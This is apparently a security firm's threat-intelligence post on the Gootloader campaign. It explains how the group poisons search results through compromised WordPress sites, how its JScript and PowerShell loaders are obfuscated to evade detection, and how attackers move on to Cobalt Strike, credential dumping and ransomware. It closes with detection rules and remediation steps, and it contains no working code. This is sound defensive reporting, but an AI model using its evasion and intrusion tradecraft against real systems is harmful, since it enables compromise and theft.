BIPI
BIPI

Gootloader SEO Poisoning: Search Your Way Into a Breach

Threat Intelligence

Gootloader hijacks search engine results to serve malware disguised as legal templates and business documents. The attack requires no phishing email: the victim comes to the attacker.

By Arjun Raghavan, Security & Systems Lead, BIPI · September 6, 2024 · 8 min read

#gootloader#seo-poisoning#malware#initial-access#powershell

Most malware delivery requires the attacker to push something at the victim: an email, a text, a pop-up. Gootloader inverts this model. The group, tracked as UNC2565 or Hive0127, compromises legitimate high-ranking websites and stuffs them with hidden forum posts optimized for search queries that professionals make: employment contracts, non-disclosure agreements, financial templates, licensing forms. The victim searches, clicks a top result, and downloads what looks like the document they wanted.

SEO Poisoning Mechanics

Gootloader operators compromise WordPress sites with significant domain authority, often ones running outdated plugins. They inject hidden pages, invisible to normal visitors, that contain thousands of keyword-stuffed forum threads. Each thread presents a fake discussion where a 'user' has asked for a specific document template and another 'user' has provided a download link. The link resolves to a .zip file served from the same compromised site.

  • Targets: WordPress sites with domain authority above 40, typically in law, finance, HR, and government sectors
  • Injection: hidden div elements or alternate URL paths not linked from the main navigation
  • Search optimization: each fake thread targets a specific long-tail keyword like 'california non-compete agreement template 2024'
  • Scale: researchers have documented over 400 compromised sites active simultaneously during peak Gootloader campaigns

Payload Delivery

The downloaded .zip contains a single .js (JScript) file with a name matching the search query. On Windows, double-clicking a .js file executes it with wscript.exe. The JScript is heavily obfuscated and contains the entire Gootloader stage-one payload inline: it writes a scheduled task, drops a PowerShell script to disk, and initiates the second-stage fetch. The obfuscation uses a combination of string concatenation, eval calls, and variable name randomization that changes per-victim to defeat static signatures.

  1. Victim searches for a business document template and clicks a top Google result
  2. Landing page is a fake forum thread with a .zip download link
  3. Victim downloads .zip, extracts, and double-clicks the .js file
  4. wscript.exe executes the JScript loader; no UAC prompt, no macro warning
  5. JScript creates a scheduled task set to run at logon, drops an obfuscated PowerShell script
  6. PowerShell script fetches and decodes second-stage payload (GootKit RAT, Cobalt Strike, or REvil)
  7. Operator accesses the host via Cobalt Strike; lateral movement begins within hours
Gootloader is unusual because the victim is the one initiating contact. There is no suspicious email to block. The attack surface is the user's browser and their professional need for a document.

PowerShell Execution Chain

The PowerShell script dropped by Gootloader uses a multi-layer encoding strategy. The outer layer is a base64-encoded string that, when decoded, produces a second PowerShell command using string format operators to reconstruct keywords that AV would flag. The innermost layer downloads a payload from a C2 URL constructed dynamically at runtime from fragments stored in separate variables. This fragmentation defeats static URL extraction from memory dumps.

Lateral Movement Patterns

  • Cobalt Strike beacon deployed within 1-3 hours of initial compromise
  • BloodHound/SharpHound executed to enumerate Active Directory
  • Credential dumping via Mimikatz or direct LSASS memory reading
  • Ransomware deployment (historically REvil, more recently INC Ransom and Agenda): typically 24-72 hours post-access
  • Operators are known to exfiltrate data before encryption for double-extortion
400+
Compromised sites used simultaneously at peak
0
Phishing emails required: the victim searches voluntarily
~2 hours
Mean time to Cobalt Strike post initial .js execution
5 years
Gootloader campaign duration (2019 to present)

Detection

  • Alert on wscript.exe or cscript.exe executing .js files from user Downloads or Desktop directories
  • SIGMA: wscript.exe spawning cmd.exe or powershell.exe, especially with encoded command arguments
  • Scheduled task creation by wscript.exe or cscript.exe is highly anomalous and should alert immediately
  • PowerShell with -EncodedCommand flag followed by outbound HTTPS to a non-corporate domain
  • DNS: Gootloader C2 domains tend to be newly registered (under 90 days) with high-entropy hostnames

Remediation

  1. Reassign .js and .jse file handlers to notepad.exe via GPO: HKLM\SOFTWARE\Classes\JSFile\shell\open\command
  2. Enable PowerShell Script Block Logging and Transcription logging via GPO
  3. Block outbound connections from wscript.exe and cscript.exe at the host firewall or via AppLocker
  4. Add web proxy category blocking for newly registered domains (Umbrella, Zscaler, Bluecoat all support this)
  5. If Gootloader execution is confirmed, treat as pre-ransomware and initiate IR playbook immediately

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.